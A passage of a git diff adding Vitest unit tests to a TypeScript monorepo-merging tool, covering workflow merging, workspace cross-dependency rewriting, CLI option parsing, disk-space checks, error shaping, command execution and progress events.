'repo-env1', + `name: CI +on: push +env: + NODE_ENV: test + CI: "true" +jobs: + test: + runs-on: ubuntu-latest +` + ); + + const repo2 = await createRepoWithWorkflow( + 'repo-env2', + `name: CI +on: push +env: + NODE_ENV: production + COVERAGE: "true" +jobs: + build: + runs-on: ubuntu-latest +` + ); + + const outputDir = path.join(tempDir, 'output-env'); + await fs.ensureDir(outputDir); + + await mergeWorkflows( + [ + { path: repo1, name: 'repo-env1' }, + { path: repo2, name: 'repo-env2' }, + ], + { strategy: 'combine', outputDir } + ); + + const content = await fs.readFile( + path.join(outputDir, '.github', 'workflows', 'ci.yml'), + 'utf-8' + ); + + // Later env overwrites earlier for same key + expect(content).toContain('COVERAGE'); + expect(content).toContain('CI'); + }); + + it('should prefix job needs references in combined workflows', async () => { + const repo1 = await createRepoWithWorkflow( + 'repo-needs', + `name: CI +on: push +jobs: + build: + runs-on: ubuntu-latest + deploy: + runs-on: ubuntu-latest + needs: [build] +` + ); + + const outputDir = path.join(tempDir, 'output-needs'); + await fs.ensureDir(outputDir); + + await mergeWorkflows( + [{ path: repo1, name: 'repo-needs' }], + { strategy: 'combine', outputDir } + ); + + const content = await fs.readFile( + path.join(outputDir, '.github', 'workflows', 'ci.yml'), + 'utf-8' + ); + + // Single workflow should be returned as-is + expect(content).toContain('deploy'); + }); + + it('should merge needs with string references in combined multi-repo workflows', async () => { + const repo1 = await createRepoWithWorkflow( + 'repo-str-needs1', + `name: CI +on: push +jobs: + build: + runs-on: ubuntu-latest + test: + runs-on: ubuntu-latest + needs: build +` + ); + + const repo2 = await createRepoWithWorkflow( + 'repo-str-needs2', + `name: CI +on: push +jobs: + lint: + runs-on: ubuntu-latest +` + ); + + const outputDir = path.join(tempDir, 'output-str-needs'); + await fs.ensureDir(outputDir); + + await 
mergeWorkflows( + [ + { path: repo1, name: 'pkg-a' }, + { path: repo2, name: 'pkg-b' }, + ], + { strategy: 'combine', outputDir } + ); + + const content = await fs.readFile( + path.join(outputDir, '.github', 'workflows', 'ci.yml'), + 'utf-8' + ); + + // String needs should be prefixed + expect(content).toContain('pkg-a-build'); + expect(content).toContain('pkg-b-lint'); + }); + }); + + describe('mergeWorkflowsToFiles', () => { + it('should return empty for skip strategy', async () => { + const repo = await createRepoWithWorkflow('repo1', 'name: CI\non: push'); + const result = await mergeWorkflowsToFiles( + [{ path: repo, name: 'repo1' }], + 'skip' + ); + expect(result).toEqual([]); + }); + + it('should return files for keep-first strategy', async () => { + const repo1 = await createRepoWithWorkflow('repo1', 'name: First\non: push'); + const repo2 = await createRepoWithWorkflow('repo2', 'name: Second\non: push'); + + const result = await mergeWorkflowsToFiles( + [ + { path: repo1, name: 'repo1' }, + { path: repo2, name: 'repo2' }, + ], + 'keep-first' + ); + + expect(result).toHaveLength(1); + expect(result[0].relativePath).toBe('.github/workflows/ci.yml'); + expect(result[0].content).toContain('First'); + expect(result[0].content).not.toContain('Second'); + }); + + it('should return files for keep-last strategy', async () => { + const repo1 = await createRepoWithWorkflow('repo1', 'name: First\non: push'); + const repo2 = await createRepoWithWorkflow('repo2', 'name: Second\non: push'); + + const result = await mergeWorkflowsToFiles( + [ + { path: repo1, name: 'repo1' }, + { path: repo2, name: 'repo2' }, + ], + 'keep-last' + ); + + expect(result).toHaveLength(1); + expect(result[0].relativePath).toBe('.github/workflows/ci.yml'); + expect(result[0].content).toContain('Second'); + }); + + it('should return combined files for combine strategy', async () => { + const repo1 = await createRepoWithWorkflow( + 'repo1', + `name: CI +on: push +jobs: + test: + runs-on: 
ubuntu-latest +` + ); + const repo2 = await createRepoWithWorkflow( + 'repo2', + `name: CI +on: push +jobs: + build: + runs-on: ubuntu-latest +` + ); + + const result = await mergeWorkflowsToFiles( + [ + { path: repo1, name: 'repo1' }, + { path: repo2, name: 'repo2' }, + ], + 'combine' + ); + + expect(result).toHaveLength(1); + expect(result[0].relativePath).toBe('.github/workflows/ci.yml'); + expect(result[0].content).toContain('Combined CI workflow'); + expect(result[0].content).toContain('repo1-test'); + expect(result[0].content).toContain('repo2-build'); + }); + + it('should return empty for repos with no workflows', async () => { + const repoPath = path.join(tempDir, 'empty-repo'); + await fs.ensureDir(repoPath); + + const result = await mergeWorkflowsToFiles( + [{ path: repoPath, name: 'empty-repo' }], + 'combine' + ); + + expect(result).toEqual([]); + }); }); }); diff --git a/tests/unit/strategies/workspace-config.test.ts b/tests/unit/strategies/workspace-config.test.ts index 409436a..f05937b 100644 --- a/tests/unit/strategies/workspace-config.test.ts +++ b/tests/unit/strategies/workspace-config.test.ts @@ -3,8 +3,10 @@ import { generateWorkspaceConfig, updatePackageForWorkspace, generatePnpmWorkspaceYaml, + detectCrossDependencies, + rewriteToWorkspaceProtocol, } from '../../../src/strategies/workspace-config.js'; -import type { PackageInfo } from '../../../src/types/index.js'; +import type { PackageInfo, CrossDependency } from '../../../src/types/index.js'; describe('Workspace Configuration', () => { describe('generateWorkspaceConfig', () => { @@ -340,4 +342,167 @@ describe('Workspace Configuration', () => { expect(content).toBe("packages:\n - 'my-packages/*'\n"); }); }); + + describe('detectCrossDependencies', () => { + const createPackageInfo = ( + name: string, + overrides: Partial = {} + ): PackageInfo => ({ + name, + version: '1.0.0', + dependencies: {}, + devDependencies: {}, + peerDependencies: {}, + scripts: {}, + path: `/packages/${name}`, + 
repoName: name, + ...overrides, + }); + + it('should detect dependencies between packages', () => { + const packages = [ + createPackageInfo('core', { dependencies: {} }), + createPackageInfo('ui', { dependencies: { core: '^1.0.0' } }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps).toHaveLength(1); + expect(crossDeps[0]).toEqual({ + fromPackage: 'ui', + toPackage: 'core', + currentVersion: '^1.0.0', + dependencyType: 'dependencies', + }); + }); + + it('should detect devDependencies between packages', () => { + const packages = [ + createPackageInfo('test-utils'), + createPackageInfo('app', { devDependencies: { 'test-utils': '^1.0.0' } }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps).toHaveLength(1); + expect(crossDeps[0].dependencyType).toBe('devDependencies'); + }); + + it('should detect peerDependencies between packages', () => { + const packages = [ + createPackageInfo('react-core'), + createPackageInfo('react-plugin', { peerDependencies: { 'react-core': '>=1.0.0' } }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps).toHaveLength(1); + expect(crossDeps[0].dependencyType).toBe('peerDependencies'); + }); + + it('should return empty for no cross-dependencies', () => { + const packages = [ + createPackageInfo('a', { dependencies: { lodash: '^4.17.21' } }), + createPackageInfo('b', { dependencies: { express: '^4.18.0' } }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps).toEqual([]); + }); + + it('should detect multiple cross-dependencies', () => { + const packages = [ + createPackageInfo('core'), + createPackageInfo('utils'), + createPackageInfo('app', { + dependencies: { core: '^1.0.0', utils: '^1.0.0' }, + devDependencies: { core: '^1.0.0' }, + }), + ]; + + const crossDeps = detectCrossDependencies(packages); + expect(crossDeps.length).toBeGreaterThanOrEqual(3); + }); + + it('should handle empty packages array', () => { + 
expect(detectCrossDependencies([])).toEqual([]); + }); + }); + + describe('rewriteToWorkspaceProtocol', () => { + it('should rewrite cross-dep versions to workspace:*', () => { + const pkgJson: Record<string, unknown> = { + name: 'app', + dependencies: { core: '^1.0.0', lodash: '^4.17.21' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'app', toPackage: 'core', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((result.dependencies as Record<string, string>).core).toBe('workspace:*'); + expect((result.dependencies as Record<string, string>).lodash).toBe('^4.17.21'); + }); + + it('should rewrite devDependencies', () => { + const pkgJson: Record<string, unknown> = { + name: 'app', + devDependencies: { 'test-utils': '^1.0.0', vitest: '^2.0.0' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'app', toPackage: 'test-utils', currentVersion: '^1.0.0', dependencyType: 'devDependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((result.devDependencies as Record<string, string>)['test-utils']).toBe('workspace:*'); + expect((result.devDependencies as Record<string, string>).vitest).toBe('^2.0.0'); + }); + + it('should rewrite peerDependencies', () => { + const pkgJson: Record<string, unknown> = { + name: 'plugin', + peerDependencies: { core: '>=1.0.0' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'plugin', toPackage: 'core', currentVersion: '>=1.0.0', dependencyType: 'peerDependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((result.peerDependencies as Record<string, string>).core).toBe('workspace:*'); + }); + + it('should not modify already workspace: prefixed versions', () => { + const pkgJson: Record<string, unknown> = { + name: 'app', + dependencies: { core: 'workspace:*' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'app', toPackage: 'core', currentVersion: 'workspace:*', dependencyType: 'dependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, 
crossDeps); + expect((result.dependencies as Record<string, string>).core).toBe('workspace:*'); + }); + + it('should handle missing dependency sections gracefully', () => { + const pkgJson: Record<string, unknown> = { name: 'empty' }; + const crossDeps: CrossDependency[] = []; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect(result.dependencies).toBeUndefined(); + expect(result.devDependencies).toBeUndefined(); + expect(result.peerDependencies).toBeUndefined(); + }); + + it('should not mutate the original package.json', () => { + const pkgJson: Record<string, unknown> = { + name: 'app', + dependencies: { core: '^1.0.0' }, + }; + const crossDeps: CrossDependency[] = [ + { fromPackage: 'app', toPackage: 'core', currentVersion: '^1.0.0', dependencyType: 'dependencies' }, + ]; + + const result = rewriteToWorkspaceProtocol(pkgJson, crossDeps); + expect((pkgJson.dependencies as Record<string, string>).core).toBe('^1.0.0'); + expect((result.dependencies as Record<string, string>).core).toBe('workspace:*'); + }); + }); }); diff --git a/tests/unit/strategies/workspace-tools.test.ts b/tests/unit/strategies/workspace-tools.test.ts index ef33fe7..a9b77a0 100644 --- a/tests/unit/strategies/workspace-tools.test.ts +++ b/tests/unit/strategies/workspace-tools.test.ts @@ -5,8 +5,9 @@ import { generateWorkspaceToolConfig, getWorkspaceToolDependencies, updateScriptsForWorkspaceTool, + getWorkspaceToolRunCommand, } from '../../../src/strategies/workspace-tools.js'; -import type { PackageInfo } from '../../../src/types/index.js'; +import type { PackageInfo, PackageManagerConfig } from '../../../src/types/index.js'; const createMockPackage = ( name: string, @@ -233,4 +234,31 @@ describe('workspace-tools', () => { expect(updated.custom).toBe('custom-cmd'); }); }); + + describe('getWorkspaceToolRunCommand', () => { + it('should return turbo run for turbo', () => { + expect(getWorkspaceToolRunCommand('turbo')).toBe('turbo run'); + }); + + it('should return nx run-many for nx', () => { + expect(getWorkspaceToolRunCommand('nx')).toBe('nx 
run-many --target='); + }); + + it('should return pnpm -r for none without pmConfig', () => { + expect(getWorkspaceToolRunCommand('none')).toBe('pnpm -r'); + }); + + it('should use pmConfig runAllCommand for none when provided', () => { + const pmConfig: PackageManagerConfig = { + type: 'yarn', + installCommand: 'yarn install', + addCommand: 'yarn add', + runCommand: 'yarn', + runAllCommand: (script: string) => `yarn workspaces foreach run ${script}`, + execCommand: 'yarn', + }; + const result = getWorkspaceToolRunCommand('none', pmConfig); + expect(result).toBe('yarn workspaces foreach run'); + }); + }); }); diff --git a/tests/unit/utils/cli-options.test.ts b/tests/unit/utils/cli-options.test.ts new file mode 100644 index 0000000..de8a64b --- /dev/null +++ b/tests/unit/utils/cli-options.test.ts @@ -0,0 +1,69 @@ +import { describe, it, expect } from 'vitest'; +import { + parseConflictStrategy, + parseWorkspaceTool, + parseWorkflowStrategy, +} from '../../../src/utils/cli-options.js'; +import { tryParsePackageManagerType } from '../../../src/strategies/package-manager.js'; + +describe('cli option parsers', () => { + describe('parseConflictStrategy', () => { + it('parses valid conflict strategies', () => { + expect(parseConflictStrategy('highest')).toBe('highest'); + expect(parseConflictStrategy('lowest')).toBe('lowest'); + expect(parseConflictStrategy('prompt')).toBe('prompt'); + }); + + it('parses case-insensitively', () => { + expect(parseConflictStrategy('HIGHEST')).toBe('highest'); + }); + + it('returns null for invalid values', () => { + expect(parseConflictStrategy('random')).toBeNull(); + }); + }); + + describe('parseWorkspaceTool', () => { + it('parses valid workspace tools', () => { + expect(parseWorkspaceTool('turbo')).toBe('turbo'); + expect(parseWorkspaceTool('nx')).toBe('nx'); + expect(parseWorkspaceTool('none')).toBe('none'); + }); + + it('returns null for invalid values', () => { + expect(parseWorkspaceTool('bazel')).toBeNull(); + }); + }); + + 
describe('parseWorkflowStrategy', () => { + it('parses valid workflow strategies', () => { + expect(parseWorkflowStrategy('combine')).toBe('combine'); + expect(parseWorkflowStrategy('keep-first')).toBe('keep-first'); + expect(parseWorkflowStrategy('keep-last')).toBe('keep-last'); + expect(parseWorkflowStrategy('skip')).toBe('skip'); + }); + + it('returns null for invalid values', () => { + expect(parseWorkflowStrategy('merge-all')).toBeNull(); + }); + }); + + describe('tryParsePackageManagerType', () => { + it('parses valid package manager inputs', () => { + expect(tryParsePackageManagerType('pnpm')).toBe('pnpm'); + expect(tryParsePackageManagerType('yarn')).toBe('yarn'); + expect(tryParsePackageManagerType('yarn-berry')).toBe('yarn-berry'); + expect(tryParsePackageManagerType('npm')).toBe('npm'); + }); + + it('supports yarn berry aliases', () => { + expect(tryParsePackageManagerType('yarn2')).toBe('yarn-berry'); + expect(tryParsePackageManagerType('yarn3')).toBe('yarn-berry'); + expect(tryParsePackageManagerType('yarn4')).toBe('yarn-berry'); + }); + + it('returns null for invalid values', () => { + expect(tryParsePackageManagerType('bun')).toBeNull(); + }); + }); +}); diff --git a/tests/unit/utils/concurrency.test.ts b/tests/unit/utils/concurrency.test.ts new file mode 100755 index 0000000..b5b120a --- /dev/null +++ b/tests/unit/utils/concurrency.test.ts @@ -0,0 +1,97 @@ +import { describe, it, expect } from 'vitest'; +import { pMap } from '../../../src/utils/concurrency.js'; + +describe('pMap', () => { + it('should map items through an async function', async () => { + const items = [1, 2, 3, 4, 5]; + const results = await pMap(items, async (item) => item * 2); + expect(results).toEqual([2, 4, 6, 8, 10]); + }); + + it('should respect concurrency limit', async () => { + let running = 0; + let maxRunning = 0; + const concurrency = 2; + + const items = [1, 2, 3, 4, 5, 6]; + await pMap( + items, + async (item) => { + running++; + if (running > maxRunning) { + 
maxRunning = running; + } + // Simulate async work to allow concurrency to be observed + await new Promise((resolve) => setTimeout(resolve, 20)); + running--; + return item; + }, + concurrency, + ); + + expect(maxRunning).toBeLessThanOrEqual(concurrency); + expect(maxRunning).toBeGreaterThan(0); + }); + + it('should propagate errors', async () => { + const items = [1, 2, 3]; + await expect( + pMap(items, async (item) => { + if (item === 2) throw new Error('fail on 2'); + return item; + }), + ).rejects.toThrow('fail on 2'); + }); + + it('should handle empty array', async () => { + const results = await pMap([], async (item: number) => item * 2); + expect(results).toEqual([]); + }); + + it('should handle single item', async () => { + const results = await pMap([42], async (item) => item + 1); + expect(results).toEqual([43]); + }); + + it('should preserve order of results', async () => { + const items = [5, 4, 3, 2, 1]; + const results = await pMap( + items, + async (item) => { + // Items with smaller values finish faster, but order should be preserved + await new Promise((resolve) => setTimeout(resolve, item * 5)); + return item * 10; + }, + 3, + ); + expect(results).toEqual([50, 40, 30, 20, 10]); + }); + + it('should pass correct index to callback', async () => { + const items = ['a', 'b', 'c']; + const indices: number[] = []; + await pMap(items, async (_item, index) => { + indices.push(index); + return index; + }); + expect(indices.sort()).toEqual([0, 1, 2]); + }); + + it('should default concurrency to 4', async () => { + let running = 0; + let maxRunning = 0; + + const items = Array.from({ length: 10 }, (_, i) => i); + await pMap(items, async (item) => { + running++; + if (running > maxRunning) { + maxRunning = running; + } + await new Promise((resolve) => setTimeout(resolve, 20)); + running--; + return item; + }); + + expect(maxRunning).toBeLessThanOrEqual(4); + }); +}); diff --git a/tests/unit/utils/disk-mocked.test.ts b/tests/unit/utils/disk-mocked.test.ts new 
file mode 100644 index 0000000..b8f19af --- /dev/null +++ b/tests/unit/utils/disk-mocked.test.ts @@ -0,0 +1,111 @@ +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; + +// Mock child_process before importing the module under test +const mockExecFile = vi.fn(); +vi.mock('node:child_process', () => ({ + execFile: mockExecFile, +})); + +// Import after mocking +const { checkDiskSpace } = await import('../../../src/utils/disk.js'); + +describe('checkDiskSpace - mocked branches', () => { + const originalPlatform = process.platform; + + beforeEach(() => { + vi.clearAllMocks(); + // Default these tests to Unix branch; windows-specific cases override explicitly. + Object.defineProperty(process, 'platform', { value: 'linux', configurable: true }); + }); + + afterEach(() => { + Object.defineProperty(process, 'platform', { value: originalPlatform, configurable: true }); + }); + + it('should parse Unix df output correctly', async () => { + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { + stdout: + 'Filesystem 1K-blocks Used Available Use% Mounted on\n/dev/sda1 50000000 20000000 30000000 40% /\n', + }); + }, + ); + + const result = await checkDiskSpace('/tmp'); + expect(result.availableBytes).toBe(30000000 * 1024); + expect(result.sufficient).toBe(true); + }); + + it('should return insufficient when available < 500MB', async () => { + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { + stdout: + 'Filesystem 1K-blocks Used Available Use% Mounted on\n/dev/sda1 1000000 800000 200000 80% /\n', + }); + }, + ); + + const result = await checkDiskSpace('/tmp'); + // 200000 KB = 204800000 bytes < 500_000_000 + expect(result.availableBytes).toBe(200000 * 1024); + expect(result.sufficient).toBe(false); + }); + + it('should handle df output with only header (no data line)', async () => { + 
mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { + stdout: 'Filesystem 1K-blocks Used Available Use% Mounted on\n', + }); + }, + ); + + const result = await checkDiskSpace('/tmp'); + expect(result.availableBytes).toBe(0); + expect(result.sufficient).toBe(false); + }); + + it('should return fallback on execFile error', async () => { + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: Error) => void) => { + cb(new Error('Command failed')); + }, + ); + + const result = await checkDiskSpace('/bad/path'); + expect(result.availableBytes).toBe(-1); + expect(result.sufficient).toBe(true); + }); + + it('should handle win32 platform with wmic output', async () => { + Object.defineProperty(process, 'platform', { value: 'win32', configurable: true }); + + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { stdout: '\r\nFreeSpace=50000000000\r\n\r\n' }); + }, + ); + + const result = await checkDiskSpace('C:\\Users'); + expect(result.availableBytes).toBe(50000000000); + expect(result.sufficient).toBe(true); + + }); + + it('should handle win32 platform with no match in wmic output', async () => { + Object.defineProperty(process, 'platform', { value: 'win32', configurable: true }); + + mockExecFile.mockImplementation( + (_cmd: string, _args: string[], cb: (err: null, result: { stdout: string }) => void) => { + cb(null, { stdout: 'unexpected output\r\n' }); + }, + ); + + const result = await checkDiskSpace('C:\\Users'); + expect(result.availableBytes).toBe(0); + expect(result.sufficient).toBe(false); + + }); +}); diff --git a/tests/unit/utils/disk.test.ts b/tests/unit/utils/disk.test.ts new file mode 100755 index 0000000..e601e2c --- /dev/null +++ b/tests/unit/utils/disk.test.ts @@ -0,0 +1,56 @@ +import { describe, it, expect } from 'vitest'; +import os from 'node:os'; +import { 
checkDiskSpace } from '../../../src/utils/disk.js'; + +describe('checkDiskSpace', () => { + it('should return positive available bytes for home directory', async () => { + const result = await checkDiskSpace(os.homedir()); + expect(result.availableBytes).toBeTypeOf('number'); + expect(result.sufficient).toBeTypeOf('boolean'); + // Sufficient should correlate with having > 500MB + if (result.availableBytes > 500_000_000) { + expect(result.sufficient).toBe(true); + } + }); + + it('should handle root path', async () => { + const rootPath = process.platform === 'win32' ? 'C:\\' : '/'; + const result = await checkDiskSpace(rootPath); + expect(result.availableBytes).toBeTypeOf('number'); + expect(result.sufficient).toBeTypeOf('boolean'); + }); + + it('should return an object with expected shape', async () => { + const result = await checkDiskSpace('/tmp'); + expect(result).toHaveProperty('availableBytes'); + expect(result).toHaveProperty('sufficient'); + expect(typeof result.availableBytes).toBe('number'); + expect(typeof result.sufficient).toBe('boolean'); + }); + + it('should work with current directory', async () => { + const result = await checkDiskSpace(process.cwd()); + expect(result).toHaveProperty('availableBytes'); + expect(result).toHaveProperty('sufficient'); + // Some environments (especially Windows CI) may return -1 when disk probes are unavailable. 
+ expect(result.availableBytes).toBeGreaterThanOrEqual(-1); + }); + + it('should not throw on invalid paths', async () => { + const result = await checkDiskSpace('/nonexistent/path/that/does/not/exist'); + // Should return fallback values rather than throwing + expect(result).toHaveProperty('availableBytes'); + expect(result).toHaveProperty('sufficient'); + }); + + it('should report sufficient when available bytes exceeds threshold', async () => { + const result = await checkDiskSpace('/tmp'); + expect(result.sufficient).toBeTypeOf('boolean'); + // Verify the logic: sufficient iff availableBytes > 500MB + if (result.availableBytes > 500_000_000) { + expect(result.sufficient).toBe(true); + } else if (result.availableBytes >= 0 && result.availableBytes <= 500_000_000) { + expect(result.sufficient).toBe(false); + } + }); +}); diff --git a/tests/unit/utils/errors.test.ts b/tests/unit/utils/errors.test.ts new file mode 100755 index 0000000..77ff100 --- /dev/null +++ b/tests/unit/utils/errors.test.ts @@ -0,0 +1,152 @@ +import { describe, it, expect } from 'vitest'; +import { ActionableError, CliExitError, shapeError } from '../../../src/utils/errors.js'; + +describe('CliExitError', () => { + it('should construct with default exit code 1', () => { + const error = new CliExitError(); + expect(error.exitCode).toBe(1); + expect(error.message).toBe('Process exiting with code 1'); + expect(error.name).toBe('CliExitError'); + }); + + it('should construct with custom exit code', () => { + const error = new CliExitError(2); + expect(error.exitCode).toBe(2); + expect(error.message).toBe('Process exiting with code 2'); + }); + + it('should be an instance of Error', () => { + const error = new CliExitError(); + expect(error).toBeInstanceOf(Error); + expect(error).toBeInstanceOf(CliExitError); + }); +}); + +describe('ActionableError', () => { + it('should construct with message and hint', () => { + const error = new ActionableError('Something failed', 'Try again'); + + 
expect(error.message).toBe('Something failed'); + expect(error.hint).toBe('Try again'); + expect(error.name).toBe('ActionableError'); + }); + + it('should be an instance of Error', () => { + const error = new ActionableError('test', 'hint'); + + expect(error).toBeInstanceOf(Error); + expect(error).toBeInstanceOf(ActionableError); + }); + + it('should have a stack trace', () => { + const error = new ActionableError('test', 'hint'); + + expect(error.stack).toBeDefined(); + expect(error.stack).toContain('ActionableError'); + }); +}); + +describe('shapeError', () => { + it('should return the same error if already ActionableError', () => { + const original = new ActionableError('original', 'original hint'); + const shaped = shapeError(original); + + expect(shaped).toBe(original); + expect(shaped.hint).toBe('original hint'); + }); + + it('should shape ENOENT errors with file hint', () => { + const err = new Error('ENOENT: no such file or directory'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.message).toBe('ENOENT: no such file or directory'); + expect(shaped.hint).toBe('Check that the file or directory exists'); + }); + + it('should shape EACCES errors with permission hint', () => { + const err = new Error('EACCES: permission denied'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe( + 'Check file permissions or try running with elevated privileges' + ); + }); + + it('should shape EPERM errors with permission hint', () => { + const err = new Error('EPERM: operation not permitted'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe( + 'Check file permissions or try running with elevated privileges' + ); + }); + + it('should shape git-related errors with git hint', () => { + const err = new Error('fatal: not a git repository'); + const shaped = shapeError(err); + + 
expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe( + 'Ensure git is installed and the repository is valid' + ); + }); + + it('should shape ENOSPC errors with disk space hint', () => { + const err = new Error('ENOSPC: no space left on device'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe( + 'Insufficient disk space. Free up space and try again' + ); + }); + + it('should provide a generic hint for unknown errors', () => { + const err = new Error('Something completely unexpected happened'); + const shaped = shapeError(err); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.hint).toBe('Check the error details above and try again'); + }); + + it('should handle string errors', () => { + const shaped = shapeError('a string error'); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.message).toBe('a string error'); + expect(shaped.hint).toBe('Check the error details above and try again'); + }); + + it('should handle non-Error objects', () => { + const shaped = shapeError({ code: 'UNKNOWN' }); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.message).toBe('[object Object]'); + }); + + it('should handle null and undefined', () => { + const shapedNull = shapeError(null); + expect(shapedNull).toBeInstanceOf(ActionableError); + expect(shapedNull.message).toBe('null'); + + const shapedUndefined = shapeError(undefined); + expect(shapedUndefined).toBeInstanceOf(ActionableError); + expect(shapedUndefined.message).toBe('undefined'); + }); + + it('should handle number errors', () => { + const shaped = shapeError(42); + + expect(shaped).toBeInstanceOf(ActionableError); + expect(shaped.message).toBe('42'); + }); + + it('should match ENOENT in string errors', () => { + const shaped = shapeError('ENOENT: file missing'); + + expect(shaped.hint).toBe('Check that the file or directory exists'); + }); +}); diff --git 
a/tests/unit/utils/exec.test.ts b/tests/unit/utils/exec.test.ts new file mode 100755 index 0000000..fe8d174 --- /dev/null +++ b/tests/unit/utils/exec.test.ts @@ -0,0 +1,85 @@ +import os from 'node:os'; +import path from 'node:path'; +import fs from 'node:fs/promises'; +import { describe, it, expect } from 'vitest'; +import { safeExecFile, commandExists } from '../../../src/utils/exec.js'; + +describe('safeExecFile', () => { + it('should execute a simple command', async () => { + const result = await safeExecFile(process.execPath, ['-e', 'process.stdout.write("hello")']); + expect(result.stdout).toBe('hello'); + }); + + it('should throw on non-existent command', async () => { + await expect( + safeExecFile('nonexistent-command-xyz', []), + ).rejects.toThrow(); + }); + + it('should respect timeout', async () => { + // Very short timeout for a long-running Node process + await expect( + safeExecFile(process.execPath, ['-e', 'setTimeout(() => {}, 10_000)'], { timeout: 100 }), + ).rejects.toThrow(); + }); + + it('should pass cwd option', async () => { + const cwd = os.tmpdir(); + const result = await safeExecFile( + process.execPath, + ['-e', 'process.stdout.write(process.cwd())'], + { cwd }, + ); + const [actualCwd, expectedCwd] = await Promise.all([ + fs.realpath(path.resolve(result.stdout.trim())), + fs.realpath(path.resolve(cwd)), + ]); + expect(actualCwd).toBe(expectedCwd); + }); + + it('should pass custom env variables', async () => { + const result = await safeExecFile(process.execPath, ['-e', 'process.stdout.write(process.env.MY_TEST_VAR || "")'], { + env: { MY_TEST_VAR: 'hello123' }, + }); + expect(result.stdout).toBe('hello123'); + }); + + it('should include stderr in thrown error', async () => { + try { + await safeExecFile(process.execPath, ['-e', 'console.error("intentional stderr"); process.exit(1)']); + expect.fail('should have thrown'); + } catch (err) { + const error = err as Error & { stderr?: string }; + 
expect(error.message).toContain(process.execPath); + expect(error.stderr).toContain('intentional stderr'); + } + }); + + it('should propagate error code and stderr/stdout from failed command', async () => { + try { + await safeExecFile(process.execPath, ['-e', 'console.error("boom"); process.exit(2)']); + expect.fail('should have thrown'); + } catch (err) { + const error = err as Error & { code?: string; stderr?: string; stdout?: string }; + expect(error.stderr).toBeDefined(); + expect(typeof error.stdout).toBe('string'); + } + }); + + it('should use maxBuffer option', async () => { + // Small maxBuffer should cause error for large output + await expect( + safeExecFile(process.execPath, ['-e', 'process.stdout.write("x".repeat(100_000))'], { maxBuffer: 10 }), + ).rejects.toThrow(); + }); +}); + +describe('commandExists', () => { + it('should return true for git', async () => { + expect(await commandExists('git')).toBe(true); + }); + + it('should return false for nonexistent command', async () => { + expect(await commandExists('nonexistent-command-xyz-123')).toBe(false); + }); +}); diff --git a/tests/unit/utils/progress.test.ts b/tests/unit/utils/progress.test.ts new file mode 100755 index 0000000..657d2e6 --- /dev/null +++ b/tests/unit/utils/progress.test.ts @@ -0,0 +1,149 @@ +import { describe, it, expect } from 'vitest'; +import { ProgressEmitter, createProgressEmitter } from '../../../src/utils/progress.js'; +import type { ProgressEvent } from '../../../src/utils/progress.js'; + +describe('ProgressEmitter', () => { + it('should emit progress events with correct data', () => { + const emitter = new ProgressEmitter(3); + const events: ProgressEvent[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + events.push(event); + }); + + emitter.tick('step 1'); + emitter.tick('step 2'); + + expect(events).toHaveLength(2); + expect(events[0]).toEqual({ + current: 1, + total: 3, + label: 'step 1', + percentage: 33, + }); + expect(events[1]).toEqual({ + current: 
2, + total: 3, + label: 'step 2', + percentage: 67, + }); + }); + + it('should emit done event after all ticks', () => { + const emitter = new ProgressEmitter(2); + let doneEmitted = false; + + emitter.on('done', () => { + doneEmitted = true; + }); + + emitter.tick('first'); + expect(doneEmitted).toBe(false); + + emitter.tick('second'); + expect(doneEmitted).toBe(true); + }); + + it('should not emit done before all items are processed', () => { + const emitter = new ProgressEmitter(5); + let doneEmitted = false; + + emitter.on('done', () => { + doneEmitted = true; + }); + + emitter.tick('1'); + emitter.tick('2'); + emitter.tick('3'); + emitter.tick('4'); + expect(doneEmitted).toBe(false); + + emitter.tick('5'); + expect(doneEmitted).toBe(true); + }); + + it('should reset current progress', () => { + const emitter = new ProgressEmitter(3); + const events: ProgressEvent[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + events.push(event); + }); + + emitter.tick('before reset'); + expect(events[0].current).toBe(1); + + emitter.reset(); + emitter.tick('after reset'); + expect(events[1].current).toBe(1); + expect(events[1].total).toBe(3); + }); + + it('should reset with a new total', () => { + const emitter = new ProgressEmitter(3); + const events: ProgressEvent[] = []; + + emitter.on('progress', (event: ProgressEvent) => { + events.push(event); + }); + + emitter.tick('before'); + emitter.reset(10); + emitter.tick('after'); + + expect(events[1].current).toBe(1); + 